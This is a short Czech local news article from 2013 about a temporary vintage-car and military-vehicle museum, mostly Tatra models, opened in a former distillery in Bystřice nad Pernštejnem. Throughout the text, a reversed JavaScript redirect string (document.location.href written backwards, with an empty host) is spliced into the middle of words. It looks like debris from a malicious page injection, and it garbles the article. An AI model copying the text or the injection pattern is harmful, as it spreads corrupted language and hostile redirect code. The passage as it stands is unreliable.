Bystřice nad Pernštejnem, aktuality, muzeum, veteráni
Rainbow page separator

V Bystřici dočasně zprovoznili muzeum veteránů

Úterý, 13. srpna 2013

OLYMPUS DIGITAL CAMERABystřice nad Pernštejnem / V bývalém bystřickém lihovaru pod náměstím byla otevřena expozice au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilových veteránů. Muzeum his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torických dopravních prostředků zprovoznil František Prosecký z tamního Veterán Tatra klubu.

Vystaveno je tam kolem třiceti osobních au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů i vojenská technika včetně nákladních aut, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vše nejčastěji značky Tatra. Nejstarší exponáty pocházejí z roku 1928. K vidění jsou rovněž dětská šlapací autíčka, v expozici jsou asi dvě desítky vozítek. „Depozit bude otevřen do konce měsíce, znovu pak až v příštím roce,“ uvedl Prosecký.
Expozici doplňují i staré hračky, ale větší množství jich budou moci lidé obdivovat až příští rok. Tedy za předpokladu, že se provozovatelům podaří sehnat finance na další bezpečnostní zařízení, které by cenné his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické exponáty ochránilo před případným zcizením.

Na úpravě pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů v někdejším lihovaru na muzeum his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torických vozidel se kromě provozovatelů podílela i bystřická radnice, konkrétně finančním příspěvkem ve výši dvě stě tisíc korun. Peníze přidal i Kraj Vysočina.